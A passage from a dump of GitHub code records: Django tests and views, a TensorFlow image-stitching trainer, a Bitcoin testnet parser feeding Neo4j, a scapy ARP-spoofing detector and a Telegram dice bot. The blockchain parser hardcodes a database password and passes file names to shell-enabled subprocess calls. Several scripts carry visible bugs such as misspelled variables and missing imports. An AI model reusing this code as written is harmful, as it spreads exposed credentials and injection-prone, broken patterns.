def test_last_update_event_date(self):\n LastUpdateEventDate.drop_collection()\n update_date = LastUpdateEventDate()\n create_date = datetime.now().__str__()\n update_date.create_date = create_date\n update_date.save()\n query = LastUpdateEventDate.objects.first()\n assert query.create_date == create_date\n\n\nclass TestEventLanguage(object):\n\n def test_event_language(self):\n EventLanguage.drop_collection()\n event_language = EventLanguage()\n instance = \"SP\"\n event_language.instance = instance\n language = \"Cinema\"\n event_language.language = language\n event_language.save()\n query = EventLanguage.objects.first()\n assert query.instance == instance\n assert query.language == language\n\n\nclass TestEventData(object):\n\n def test_event_data(self):\n EventData.drop_collection()\n event_data = EventData()\n instance = \"SP\"\n event_data.instance = instance\n occurrences = [\n {\n \"id\": 1147,\n \"space\": {\n \"id\": 14191,\n \"acessibilidade\": \"Sim\"\n }\n }\n ]\n event_data.occurrences = occurrences\n date = datetime(2017, 11, 14, 3, 5, 55, 88000)\n event_data.date = date\n age_range = \"Livre\"\n event_data.age_range = age_range\n event_data.save()\n query = EventData.objects.first()\n assert query.instance == instance\n assert query.occurrences == occurrences\n assert query.date == date\n assert query.age_range == age_range\n\n\nclass TestPopulateEventData(object):\n\n @requests_mock.Mocker(kw='mock')\n def test_populate_event_data(self, **kwargs):\n parser_yaml = ParserYAML()\n urls = parser_yaml.get_multi_instances_urls\n\n result = [{\"createTimestamp\": {\"date\": \"2012-01-01 00:00:00.000000\"},\n \"terms\": {\"linguagem\": \"Cinema\"},\n \"classificacaoEtaria\": \"livre\",\n \"occurrences\":\n [{\"id\": 1147, \"space\": {\"id\": 14191,\n \"acessibilidade\": \"Sim\"}}]}]\n\n for url in urls:\n kwargs['mock'].get(url + \"event/find/\", text=json.dumps(result))\n\n LastUpdateEventDate.drop_collection()\n EventLanguage.drop_collection()\n EventData.drop_collection()\n\n populate_event_data()\n\n assert LastUpdateEventDate.objects.count() != 0\n assert EventData.objects.count() != 0\n assert EventLanguage.objects.count() != 0\n\n\nclass TestClassRequestEventsRawData(object):\n\n @requests_mock.Mocker(kw='mock')\n def test_success_request(self, **kwargs):\n current_time = datetime.now().__str__()\n url = \"http://mapas.cultura.gov.br/api/\"\n\n result = [{\"createTimestamp\": {\"date\": \"2012-01-01 00:00:00.000000\"},\n \"terms\": {\"linguagem\": \"Cinema\"},\n \"classificacaoEtaria\": \"livre\"}]\n\n kwargs['mock'].get(url + \"event/find/\", text=json.dumps(result))\n\n request_events_raw_data = RequestEventsRawData(current_time, url)\n response_events_raw_data = request_events_raw_data.response\n response_status_code = response_events_raw_data.status_code\n assert response_status_code == 200\n\n @requests_mock.Mocker(kw='mock')\n def test_data_content(self, **kwargs):\n current_time = datetime.now().__str__()\n\n url = \"http://mapas.cultura.gov.br/api/\"\n\n result = [{\"createTimestamp\": {\"date\": \"2012-01-01 00:00:00.000000\"},\n \"terms\": {\"linguagem\": \"Cinema\"},\n \"classificacaoEtaria\": \"livre\"}]\n\n kwargs['mock'].get(url + \"event/find/\", text=json.dumps(result))\n\n request_events_raw_data = RequestEventsRawData(current_time, url)\n events_raw_data = request_events_raw_data.data\n type_events_raw_data = type(events_raw_data)\n empty_list = []\n assert type_events_raw_data == type(empty_list)\n\n @requests_mock.Mocker(kw='mock')\n def test_data_lenght(self, **kwargs):\n current_time = datetime.now().__str__()\n url = \"http://mapas.cultura.gov.br/api/\"\n\n result = [{\"createTimestamp\": {\"date\": \"2012-01-01 00:00:00.000000\"},\n \"terms\": {\"linguagem\": \"Cinema\"},\n \"classificacaoEtaria\": \"livre\"}]\n\n kwargs['mock'].get(url + \"event/find/\", text=json.dumps(result))\n request_events_raw_data = RequestEventsRawData(current_time, url)\n events_raw_data = request_events_raw_data.data_length\n type_events_raw_data = type(events_raw_data)\n intenger = 1\n assert type_events_raw_data == type(intenger)\n\n\nclass TestClassRequestEventsInPeriod(object):\n\n @requests_mock.Mocker(kw='mock')\n def test_success_request_in_period(self, **kwargs):\n year = 2013\n url = \"http://spcultura.prefeitura.sp.gov.br/api/\"\n\n result = [{\"createTimestamp\": {\"date\": \"2012-01-01 00:00:00.000000\"},\n \"terms\": {\"linguagem\": \"Cinema\"},\n \"classificacaoEtaria\": \"livre\"}]\n\n kwargs['mock'].get(url + \"event/find/\", text=json.dumps(result))\n\n request_events_in_period = RequestEventsInPeriod(year, url)\n response_events_in_period = request_events_in_period.response\n response_status_code = response_events_in_period.status_code\n assert response_status_code == 200\n\n @requests_mock.Mocker(kw='mock')\n def test_data_content(self, **kwargs):\n year = 2013\n url = \"http://spcultura.prefeitura.sp.gov.br/api/\"\n\n result = [{\"createTimestamp\": {\"date\": \"2012-01-01 00:00:00.000000\"},\n \"terms\": {\"linguagem\": \"Cinema\"},\n \"classificacaoEtaria\": \"livre\"}]\n\n kwargs['mock'].get(url + \"event/find/\", text=json.dumps(result))\n\n request_events_in_period = RequestEventsInPeriod(year, url)\n events_in_period = request_events_in_period.data\n type_events_in_period = type(events_in_period)\n empty_list = []\n assert type_events_in_period == type(empty_list)\n\n @requests_mock.Mocker(kw='mock')\n def test_data_lenght(self, **kwargs):\n year = 2013\n url = \"http://spcultura.prefeitura.sp.gov.br/api/\"\n\n result = [{\"createTimestamp\": {\"date\": \"2012-01-01 00:00:00.000000\"},\n \"terms\": {\"linguagem\": \"Cinema\"},\n \"classificacaoEtaria\": \"livre\"}]\n\n kwargs['mock'].get(url + \"event/find/\", text=json.dumps(result))\n request_events_in_period = RequestEventsInPeriod(year, url)\n events_in_period = request_events_in_period.data_length\n type_events_in_period = type(events_in_period)\n intenger = 1\n assert type_events_in_period == type(intenger)\n\n\nclass TestEmptyRequest(object):\n\n def test_request_data(self):\n request = EmptyRequest()\n\n event_request = request.data\n type_event_request = type(event_request)\n empty_list = []\n assert type_event_request == type(empty_list)\n\n def test_request_lenght(self):\n request = EmptyRequest()\n events_request = request.data_length\n type_request = type(events_request)\n intenger = 1\n assert type_request == type(intenger)\n","repo_name":"fga-eps-mds/2017.2-QueroCultura","sub_path":"events_indicators/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":7769,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"52"} +{"seq_id":"22080115692","text":"#!/usr/bin/python3\r\n\r\n\"\"\"\r\nCMSC733 Spring 2019: Classical and Deep Learning Approaches for\r\nGeometric Computer Vision\r\nProject 1: MyAutoPano: Phase 2 Starter Code\r\n\r\n\r\nAuthor(s):\r\nNitin J. Sanket (nitinsan@terpmail.umd.edu)\r\nPhD Candidate in Computer Science,\r\nUniversity of Maryland, College Park\r\n\"\"\"\r\n\r\n# Dependencies:\r\n# opencv, do (pip install opencv-python)\r\n# skimage, do (apt install python-skimage)\r\n# termcolor, do (pip install termcolor)\r\n\r\nfrom re import L\r\nfrom unittest.mock import patch\r\n# import tensorflow as tf\r\nimport tensorflow.compat.v1 as tf\r\ntf.disable_v2_behavior()\r\nimport cv2\r\nimport sys\r\nimport os\r\nimport glob\r\n# import Misc.ImageUtils as iu\r\nimport random\r\nfrom skimage import data, exposure, img_as_float\r\nimport matplotlib.pyplot as plt\r\nfrom Network.Network import HomographyModel\r\nfrom Network.UnsupervisedNetwork import UnsupervisedModel\r\nfrom Misc.MiscUtils import *\r\nfrom Misc.DataUtils import *\r\nimport numpy as np\r\nimport time\r\nimport argparse\r\nimport shutil\r\n# from StringIO import StringIO\r\nimport string\r\nfrom termcolor import colored, cprint\r\nimport math as m\r\nfrom tqdm import tqdm\r\nfrom Misc.TFSpatialTransformer import *\r\nfrom sklearn.utils import shuffle\r\nfrom math import ceil\r\nfrom keras import backend as K\r\nfrom tensorflow.keras.callbacks import ModelCheckpoint\r\nfrom GenerateData import GeneratePatches\r\n\r\n\r\n# Don't generate pyc codes\r\nsys.dont_write_bytecode = True\r\nconfig = tf.compat.v1.ConfigProto(gpu_options=tf.compat.v1.GPUOptions(allow_growth=True))\r\nsess = tf.compat.v1.Session(config=config)\r\n\r\ndef generator(ImagesPath,n_images,batch_size,image_names):\r\n \r\n # Infinite loop which ends when epochs specified is completed\r\n while True:\r\n # Creating batches\r\n patches=[]\r\n labels = []\r\n count=0\r\n while(count(t) \"\n \"MERGE (b)-[:COINBASE {witness:$wit, script_sig:$script_sig}]->(t) \",\n block_id=block_id, tx_id=tx_id, wit=str(witnesses),\n script_sig=inputs[0].script_sig.hex(),version=version, \n locktime=locktime,segwit=segwit)\n app_log.info(f\"Coinbase transaction {tx_id}\")\n return\n \n @staticmethod\n def _new_tx(tx,block_id, version, locktime, tx_id, inputs, outputs, segwit, i,coinbase=False):\n _outputs = []\n _inputs = []\n \n def encode_address(_script_pubkey,testnet=True):\n address = \"\"\n addr_type = \"\"\n length = encode_varint(len(_script_pubkey))\n stream = BytesIO(length+_script_pubkey)\n #stream = BytesIO(_script_pubkey)\n try: \n script_pubkey = Script.parse(stream)\n if script_pubkey.is_p2pkh_script_pubkey(): \n address= h160_to_p2pkh_address(script_pubkey.cmds[2], testnet)\n addr_type =\"P2PKH\"\n elif script_pubkey.is_p2sh_script_pubkey(): \n address= h160_to_p2sh_address(script_pubkey.cmds[1], testnet)\n addr_type = \"P2SH\"\n elif script_pubkey.is_p2wpkh_script_pubkey() or script_pubkey.is_p2wsh_script_pubkey(): \n if testnet: address = segwit_addr.encode(\"tb\",0,script_pubkey.cmds[1])\n else: address = segwit_addr.encode(\"bc\",0,script_pubkey.cmds[1]) \n if script_pubkey.is_p2wpkh_script_pubkey(): addr_type = \"P2WPKH\"\n else: addr_type = \"P2WSH\"\n elif len(script_pubkey.cmds)==2 and script_pubkey.cmds[1]==0xac:\n try: \n address = script_pubkey.cmds[0].hex()\n addr_type = \"P2PK\"\n except: app_log.info(f\"P2PK failed {script_pubkey.cmds[0]} from tx: {output['t.id']}\")\n\n except:\n app_log.info(f\"script parsing failed.\")\n \n \n return address, addr_type\n \n for index,output in enumerate(outputs):\n address, addr_type = encode_address(output.script_pubkey)\n output = {\n \"index\":index,\n \"script_pubkey\" : output.script_pubkey.hex(),\n \"amount\" : output.amount,\n \"address\" : address,\n \"type\" : addr_type\n }\n _outputs.append(output)\n \n for tx_in in inputs:\n witnesses = []\n for wit in tx_in.witness:\n try: witness = wit.hex()\n except: witness = wit\n witnesses.append(witness)\n \n _input = {\n \"prev_tx\" : tx_in.prev_tx.hex(),\n \"script_sig\" : tx_in.script_sig.hex(),\n \"witness\" : str(witnesses),\n \"prev_index\" : tx_in.prev_index\n }\n #We have to check if this is a coinbase transaction. If it is, it means it has no input. We only append no coinbase ins.\n #if _input[\"prev_index\"] != 4294967295:\n _inputs.append(_input)\n \n query = \"MERGE (b:block {id:$block_id}) \\n\"\n query+= \"MERGE (t:transaction {id:$tx_id}) \\n\"\n query+= \"SET t.version=$version, t.segwit=$segwit, t.locktime=$locktime \\n\"\n query+= \"MERGE (t)<-[:CONTAINS {i:$i}]-(b) \\n\"\n query+= \"WITH t,b \\n\"\n query+= \"FOREACH (output in $outputs | \\n\"\n query+= \"MERGE (o:output {index:output.index})<-[:CREATES]-(t) \\n\"\n query+= \"SET o.amount=output.amount, o.script_pubkey=output.script_pubkey \\n\"\n query+= \"FOREACH(ignoreMe IN CASE WHEN output.address <> '' THEN [1] ELSE [] END | \\n\"\n query+= \"MERGE (a:address {address:output.address}) SET a.address_type=output.type \\n \"\n query+= \"MERGE (a)<-[:RELATES]-(o)\"\n query+= \") \"\n query+= \") \\n\"\n \n if coinbase:\n query+= \"FOREACH (input in $inputs | \\n\"\n query+= \"MERGE (b)-[:COINBASE {witness:input.witness, script_sig:input.script_sig}]->(t)) \"\n #query+= \")\"\n else: \n query+= \"FOREACH (input in $inputs | \\n\"\n query+= \"MERGE (prev_trans: transaction {id:input.prev_tx}) \\n\"\n query+= \"MERGE (tx_in: output {index:input.prev_index})<-[:CREATES]-(prev_trans) \\n\"\n query+= \"MERGE (tx_in)-[:SPENDS {script_sig:input.script_sig, witness:input.witness}]->(t) \\n\"\n query+= \")\"\n \n result = tx.run(query,tx_id=tx_id, segwit=segwit, version=version, locktime=locktime, \n inputs=_inputs, outputs=_outputs, block_id=block_id, i=i)\n \n \n \n\n return True\n \n @staticmethod\n def _new_block(tx,block_id,version, prev_block,merkle_root,timestamp,bits,nonce,n_tx):\n #_height = tx.run( \"MATCH (u:block) RETURN COUNT (u) \").single()[0] \n #pblock = tx.run(\"MATCH (prev_block:block {id:$prev_block}) RETURN prev_block\", prev_block=prev_block)\n #if not pblock.single():\n # print(f\"COULD NOT FIND PREVIOUS BLOCK {prev_block}.\")\n result = tx.run(\"MERGE (block:block {id:$block_id}) \"\n \"SET block.n_tx=$n_tx, block.nonce=$nonce, block.merkle_root=$merkle_root, block.bits=$bits, block.timestamp=$timestamp, block.version=$version \"\n \"MERGE (prevblock:block {id:$prev_block}) \"\n \"MERGE (block)<-[:LINKS]-(prevblock) \"\n \"RETURN block \",\n block_id=block_id, version=version, prev_block=prev_block, merkle_root=merkle_root, timestamp=timestamp, \n bits=bits, nonce=nonce, n_tx=n_tx)\n return result.data()\n \n\n @staticmethod \n def _check_constrains(tx):\n \n print(\"checking constraints.\")\n \n tx_id = False\n block_id = False\n address_address = False\n result = tx.run(\"CALL db.constraints\")\n constraints = result.data()\n for constraint in constraints:\n if \"transaction.id\" in constraint[\"description\"] and \"UNIQUE\" in constraint[\"description\"]: tx_id = True\n elif \"block.id\" in constraint[\"description\"] and \"UNIQUE\" in constraint[\"description\"]: block_id = True\n elif \"address.address\" in constraint[\"description\"] and \"UNIQUE\" in constraint[\"description\"]: address_address = True\n if tx_id and block_id and address_address:\n print(\"CONSTRAINTS ALREADY EXISTS!\")\n return True\n else:\n result = tx.run(\"MERGE (b:block {id:'0000000000000000000000000000000000000000000000000000000000000000'}) \\n\"\n \"SET b.height = -1 \\n\"\n \"MERGE (t:transaction {id:'CONFIG'}) \\n\"\n \"MERGE (a:address {address:'CONFIG'}) \\n\"\n \"RETURN b,t,a \\n\")\n return False\n \n @staticmethod \n def _config_constrains(tx):\n \n result2 = tx.run(\"CREATE CONSTRAINT ON (t:transaction) ASSERT t.id IS UNIQUE \\n\")\n result3 = tx.run(\"CREATE CONSTRAINT ON (a:address) ASSERT a.address IS UNIQUE \\n\")\n result4 = tx.run( \"CREATE CONSTRAINT ON (b:block) ASSERT b.id IS UNIQUE \\n\")\n result4 = tx.run( \"CREATE CONSTRAINT ON (b:block) ASSERT b.height IS UNIQUE \\n\")\n \n print(\"constraints created.\")\n return \n \n def config_constrains(self):\n checked = False\n with self._driver.session() as session:\n result = session.write_transaction(self._check_constrains)\n #print(result)\n checked = result\n if not checked:\n with self._driver.session() as session:\n result = session.write_transaction(self._config_constrains)\n print(result)\n return result\n \n @staticmethod \n def _get_sixth_block_behind(tx):\n \n result = tx.run(\"MATCH (b:block) \"\n \"WITH MAX(b.height) AS tip \"\n \"MATCH (b:block {height:tip})<-[:LINKS]-(:block)<-[:LINKS]-(:block)\"\n \"<-[:LINKS]-(:block)<-[:LINKS]-(:block)<-[:LINKS]-(:block)<-[:LINKS]\"\n \"-(:block)<-[:LINKS]-(x:block) \"\n \"RETURN x.id\" )\n data = result.data()\n return data\n \n \n def new_tx(self, block_id, version, locktime, tx_id, inputs, outputs, segwit,i,coinbase):\n with self._driver.session() as session:\n result = session.write_transaction(self._new_tx, block_id, version, locktime, tx_id, inputs, outputs, segwit,i,coinbase)\n \n def new_coinbase_tx(self, block_id, version, locktime, tx_id, inputs, outputs, segwit,i):\n with self._driver.session() as session:\n result = session.write_transaction(self._new_coinbase_tx, block_id, version, locktime, tx_id, inputs, outputs, segwit,i)\n \n def new_block(self,block_id,version, prev_block,merkle_root,timestamp,bits,nonce,n_tx):\n with self._driver.session() as session:\n result = session.write_transaction(self._new_block,block_id,version, prev_block,merkle_root,timestamp,bits,nonce,n_tx)\n if len(result) >0: app_log.info(f\"CREATED BLOCK {block_id}\")\n else: app_log.error(f\"FAILED AT CREATING BLOCK {block_id}\")\n #print(result)\n return\n \n def get_sixth_block_behind(self):\n with self._driver.session() as session:\n result = session.write_transaction(self._get_sixth_block_behind)\n return result\n \n \ndef manager(args):\n \"\"\"\n args is a touple of 2 arguments: (arg1, arg2)\n arg1 is the index of the first blk#####.dat file that the parser will work on.\n arg2 is the number of threats, and therefore the number of files the parser will work on.\n For example, if the arguments are (2,2), this means that the parser will work on files\n blk00002.dat and blk00003.dat at the same time.\n arg2 should never be more than 3 for efficiency reasons.\n \"\"\"\n #n_threads should be 3 or 2 to get maximum efficiency.\n \n n_threads = args[1]\n n = args[0]\n #db = BlockChainDB(driver = args[2])\n db = BlockChainDB(\"neo4j://10.0.0.30:7687\", \"neo4j\", \"wallet\")\n db.config_constrains()\n file_list = [(f\"{i:05}\",db) for i in range( n , n + n_threads )]\n with concurrent.futures.ThreadPoolExecutor(max_workers=n_threads) as executor:\n executor.map(parse_blockchain, file_list) \n return True \n\ndef get_cursor(file):\n c = 0\n print(f\"checking for cursors {file}\")\n try:\n cursor = open(f\"cursors/cursor{file}.txt\")\n c = cursor.readline()\n try:\n c = int(c)\n app_log.info(f\"cursor at {c} for file blk{file}.dat\")\n coursor.close()\n return c\n except:\n if c == \"finished\":\n print(c)\n return True\n else:\n try: \n app_log.info(f\"trying to recover file from backup for file blk{file}.dat.\")\n cursor = open(f\"{file[:-4]}.txt.bck\")\n c = coursor.readline()\n try:\n c = int(c)\n subprocess.call(f\" cp cursors/cursor{file}.txt.bck cursors/cursor{file}.txt\", shell=True)\n app_log.info(f\"succesfully recovered file from backup for file blk{file}.dat. Restored original file.\")\n coursor.close()\n return c\n except:\n if c == \"FINISHED!\":\n coursor.close()\n print(c)\n subprocess.call(f\" cp cursors/cursor{file}.txt.bck cursors/cursor{file}.txt\",shell=True)\n app_log.info(f\"Finished. Succesfully updated original file for file blk{file}.dat.\")\n return c\n else:\n app_log.info(f\"Corrupted cursor files for file blk{file}.dat.\")\n raise Exception\n\n except:\n app_log.info(f\"No back-up file for file blk{file}.dat.\")\n raise Exception\n\n\n except:\n cursor = open(f\"cursors/cursor{file}.txt\",\"w\")\n app_log.info(f\"No cursor file for file blk{file}.dat.\")\n cursor.write(str(c))\n print(c)\n cursor.close()\n return c\n\n \n\ndef parse_blockchain(args):\n \"\"\"\n args: ( file index (######), database driver )\n \"\"\"\n parsing_current=True\n continious_mode=False\n file = f\"/home/pi/bitcoin/testnet3/blocks/blk{args[0]}.dat\"\n db=args[1]\n print(f\"parsing {file} on process {os.getpid()}\")\n #print(f\"driver {db}\")\n \n while parsing_current:\n \n with open(file,\"rb\") as block_file:\n \n print(f\"opened {file}\")\n c = get_cursor(args[0])\n if c == \"FINISHED!\":\n print(f\"We are done with file {file}\")\n return\n if c !=0: \n print(f\"reading from {c} for file {file}.\")\n block_file.read(c)\n\n #infinite loop to parse the blk#####.dat file. \n #Only stops when an error occures or the file is over.\n while True:\n \n\n try:\n #parse the block using the class Block from the file block.py\n this_block = Block.parse_from_blk(block_file)\n #The last file is full of fake blocks that contains 0 transactions and bits =0. If we run into these\n #fake blocks, we stop parsing to avoid filling the database with fake blocks and prevent from reading\n #the up comming blocks.\n if this_block.tx_hashes == 0 and int.from_bytes(this_block.bits,\"big\") == 0:\n parsing_current=True \n continious_mode=True\n print(\"No new blocks. Sleeping for a minute.\")\n sleep(60)\n break\n parsing_current=False \n #calculate the block id using the header of the parsed block:\n #first the header is concatenated\n header = this_block.version.to_bytes(4,\"little\")+this_block.prev_block[::-1]+this_block.merkle_root[::-1]+this_block.timestamp.to_bytes(4,\"little\") + this_block.bits + this_block.nonce\n #then the concatenated header is hashed to get the block id.\n block_id = hash256(header)[::-1]\n app_log.info(f\"new block from file: {file[-13:]}\")\n #A new block is created in the database using the parsed block and its id.\n db.new_block(block_id.hex(),this_block.version, this_block.prev_block.hex(), \n this_block.merkle_root.hex(),this_block.timestamp, \n int.from_bytes(this_block.bits,\"big\"), \n int.from_bytes(this_block.nonce,\"big\"),\n this_block.tx_hashes)\n \n \n #Every transaction in the block is parsed using the Tx class from the file tx.py\n for transaction in range(this_block.tx_hashes):\n #the current transaction is parsed \n tx = Tx.parse(block_file)\n tx_id = tx.id()\n coinbase = tx.is_coinbase()\n #the parsed transaction is created in the database \n db.new_tx(block_id.hex(), tx.version, tx.locktime, tx_id, tx.tx_ins, tx.tx_outs, tx.segwit,transaction,coinbase)\n \n \n if continious_mode:\n continious_mode=False\n sixth_block_behind = db.get_sixth_block_behind()\n print(sixth_block_behind)\n try: blk_id = sixth_block_behind[0][\"x.id\"]\n except Exception as e:\n print(e)\n print(e.with_traceback)\n print(f\"couldn't get the sixth block behind for block {block_id.hex()}\")\n continue\n try: add_height.main(blk_id)\n except: print(\"A problem occured while adding the height to the last blocks.\")\n \n \n #the cursor is updated to start reading the next block. 8 bytes are added since some info comes before the flag. \n c += (this_block.size + 8)\n print(f\"cursor now at {c} for file {file}\")\n #print(c)\n #the cursor file and its backup file are updated\n cursor = open(f\"cursors/cursor{args[0]}.txt\",\"w\")\n cursor.write(str(c))\n cursor.close()\n cursor = open(f\"cursors/cursor{args[0]}.txt.bck\",\"w\")\n cursor.write(str(c))\n cursor.close()\n\n\n except Exception as e:\n size = os.stat(file).st_size\n if c == size:\n cursor = open(f\"cursors/cursor{args[0]}.txt\",\"w\")\n cursor.write(\"FINISHED!\")\n cursor.close()\n cursor = open(f\"cursors/cursor{args[0]}.txt.bck\",\"w\")\n cursor.write(\"FINISHED!\")\n cursor.close()\n \n print(f\"Finished {file} file. \")\n else:\n print(e)\n print(e.with_traceback)\n break\n\n\n\n\n","repo_name":"oscarsernarosero/block_explorer","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":20233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72242966246","text":"from scapy.all import Ether, ARP, srp, sniff, conf\r\nfrom colorama import init, Fore\r\nimport sys, random\r\n\r\n# some colors\r\ninit()\r\nGREEN = Fore.GREEN\r\nRESET = Fore.RESET\r\nGRAY = Fore.LIGHTBLACK_EX\r\n\r\ndef ClownLogo():\r\n clear = \"\\x1b[0m\"\r\n colors = [36, 32, 34, 35, 31, 37]\r\n\r\n x = \"\"\"\r\n\r\n \r\n ____ __ __ ___ ____ ____ _____ ____\r\n / __ \\___ / /____ _____/ /_ / | / __ \\/ __ \\ / ___/____ ____ ____ / __/\r\n / / / / _ \\/ __/ _ \\/ ___/ __/ / /| | / /_/ / /_/ / \\__ \\/ __ \\/ __ \\/ __ \\/ /_ \r\n / /_/ / __/ /_/ __/ /__/ /_ / ___ |/ _, _/ ____/ ___/ / /_/ / /_/ / /_/ / __/ \r\n /_____/\\___/\\__/\\___/\\___/\\__/ /_/ |_/_/ |_/_/ /____/ .___/\\____/\\____/_/ \r\n /_/ \r\n CS! : Detect ARP Spoof es un script facil de usar podra ejecutarlo solo en linux. \r\n \"\"\"\r\n for N, line in enumerate(x.split(\"\\n\")):\r\n sys.stdout.write(\"\\x1b[1;%dm%s%s\\n\" % (random.choice(colors), line, clear))\r\n time.sleep(0.05)\r\n\r\ndef get_mac(ip):\r\n \"\"\"\r\n Returns the MAC address of `ip`, if it is unable to find it\r\n for some reason, throws `IndexError`\r\n \"\"\"\r\n p = Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip)\r\n result = srp(p, timeout=3, verbose=False)[0]\r\n return result[0][1].hwsrc\r\n\r\ndef process(packet):\r\n # if the packet is an ARP packet\r\n if packet.haslayer(ARP):\r\n # if it is an ARP response (ARP reply)\r\n if packet[ARP].op == 2:\r\n try:\r\n # get the real MAC address of the sender\r\n real_mac = get_mac(packet[ARP].psrc)\r\n # get the MAC address from the packet sent to us\r\n response_mac = packet[ARP].hwsrc\r\n # if they're different, definetely there is an attack\r\n if real_mac != response_mac:\r\n print(f\"[!] You are under attack, REAL-MAC: {real_mac.upper()}, FAKE-MAC: {response_mac.upper()}\")\r\n except IndexError:\r\n # unable to find the real mac\r\n # may be a fake IP or firewall is blocking packets\r\n pass\r\n\r\nif __name__ == \"__main__\":\r\n import sys\r\n ClownLogo()\r\n try:\r\n iface = sys.argv[1]\r\n except IndexError:\r\n iface = conf.iface\r\n sniff(store=False, prn=process, iface=iface)\r\n","repo_name":"Th3Brock/Detect_ARP_Spoof","sub_path":"detect_arp_spoof.py","file_name":"detect_arp_spoof.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25246697694","text":"import telebot\nimport random\nfrom telebot import types\nimport config\n\n# Создаем бота\nbot = telebot.TeleBot(config.TOKEN)\n# Команда start\n@bot.message_handler(commands=[\"start\"])\n\ndef start(m, res=False):\n # Добавляем две кнопки\n markup=types.ReplyKeyboardMarkup(resize_keyboard=True)\n btn1=types.KeyboardButton(\"d20\")\n btn2=types.KeyboardButton(\"d12\")\n btn3=types.KeyboardButton(\"d8\")\n btn4=types.KeyboardButton(\"d6\")\n btn5=types.KeyboardButton(\"d4\")\n btn6=types.KeyboardButton(\"d100\")\n markup.add(btn1, btn2, btn3, btn4, btn5, btn6)\n bot.send_message(m.chat.id, 'Бросай дайсы!', reply_markup=markup)\n# Получение сообщений от юзера\n@bot.message_handler(content_types=[\"text\"])\n\ndef handle_text(message):\n # Бросок d8\n if message.text.strip() == 'd20' :\n answer = random.randint(1,20)\n # Бросок d20\n elif message.text.strip() == 'd12':\n answer = random.randint(1,12)\n elif message.text.strip() == 'd8':\n answer = random.randint(1,8)\n elif message.text.strip() == 'd6':\n answer = random.randint(1,6)\n elif message.text.strip() == 'd4':\n answer = random.randint(1,4)\n elif message.text.strip() == 'd100':\n answer = random.randint(1,100)\n # Отсылаем юзеру сообщение в его чат\n bot.send_message(message.chat.id, answer)\n# Запускаем бота\nbot.polling(none_stop=True, interval=0)","repo_name":"MetaruHebi/DiceBot","sub_path":"DiceBot/DiceBot.py","file_name":"DiceBot.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26299598667","text":"from django.contrib import admin\nfrom django.urls import path\nfrom servicios import views\nurlpatterns = [\n path('servicios/citas/', views.citasv, name=\"citas\"),\n path('modificar-citas//', views.modificar_citas, name=\"modificar_citas\"),\n path('eliminar-citas//', views.eliminar_cita, name=\"eliminar_cita\"),\n path('servicios/cartonvacunas/', views.carton_vacunas, name=\"carton\"),\n path('modificar-carton//', views.modificar_carton, name=\"modificar_carton\"),\n path('eliminar-carton//', views.eliminar_carton, name=\"eliminar_carton\"),\n path('servicios/hospitalizacion/', views.hospitalizacionv, name=\"hospitalizacion\"),\n path('modificar-hospitalizacion//', views.modificar_hospitalizacion, name=\"modificar_hospitalizacion\"),\n path('eliminar-hospitalizacion//', views.eliminar_hospitalizacion, name='eliminar_hospitalizacion'),\n path('servicios/recetamedica', views.receta_medicas, name=\"receta\"),\n path('modificar-receta//', views.modificar_receta, name=\"modificar_receta\"),\n path('eliminar-receta/', views.eliminar_receta, name=\"eliminar_receta\"),\n]","repo_name":"JsonAndrx/vetasoft","sub_path":"servicios/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70755717285","text":"import json\nfrom django.core import serializers\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom django.db.models import Q\nfrom django.http import HttpResponse\nfrom django.utils.text import slugify\nfrom django.views.generic import DetailView, View\n\nfrom .players.models import Player, PLAYER_HELPERS, PLAYER_POSITION_LINE_CHOICES\nfrom .players.forms import PlayersFilterForm\n\n\nclass ObjectDetailView(DetailView):\n template_name = 'shared/detail.html'\n\n def pagination(self, queryset, page_count=28):\n # Create pagination for the players return\n paginator = Paginator(queryset, page_count)\n\n # Get the page from the URL\n page = self.request.GET.get('page')\n\n try:\n # Deliver the requested page\n pagination = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer, deliver first page.\n pagination = paginator.page(1)\n except EmptyPage:\n # If page is out of range (e.g. 9999), deliver last page of results.\n pagination = paginator.page(paginator.num_pages)\n\n return pagination\n\n def get_context_data(self, **kwargs):\n context = super(ObjectDetailView, self).get_context_data()\n\n obj = self.get_object()\n model_name = type(obj).__name__\n\n # Creates club=club, league=league, etc.\n filters = {model_name.lower(): obj}\n\n # Grab all of the things we want to filter the players by\n get_filters = self.request.GET.dict()\n\n # Remove the page key as that is for pagination\n get_filters.pop('page', '')\n\n position_group = get_filters.pop('group', '')\n\n if position_group:\n get_filters['position__in'] = position_group.upper().split('-')\n\n # These are for ordering by, not filtering\n sort_by = get_filters.pop('sort', '')\n sort_order = get_filters.pop('order', '')\n\n # Get our initial lot of players\n players = Player.objects.filter(\n **filters\n ).select_related(\n 'club', 'league', 'nation'\n )\n\n if sort_by:\n players = players.order_by(\n '{}{}'.format('-' if sort_order == 'desc' else '', sort_by)\n )\n\n # Grab the form so we can get the fields we filter by\n player_filter_form = PlayersFilterForm()\n\n # Some of the keys are wrong 'sho_han' for example, need to get the model field name\n sort_filters = {slugify(field.label).replace('-', '_'): field.label for\n field in player_filter_form}\n\n # Filter even further based on the GET parameters\n players = players.filter(\n **get_filters\n )\n\n # Rename to key so it can be removed form the url in the template\n if position_group:\n get_filters['group'] = get_filters.pop('position__in')\n\n context.update({\n 'players': self.pagination(players),\n 'player_instance': PLAYER_HELPERS,\n 'sort_filters': sort_filters,\n 'url_namespace': '{}:{}'.format(\n '{}s'.format(model_name),\n model_name\n ).lower(),\n 'get_filters': get_filters\n })\n\n return context\n\n\ndef card_class(obj):\n card_class = ''\n color_classes = {\n ' is-bronze': 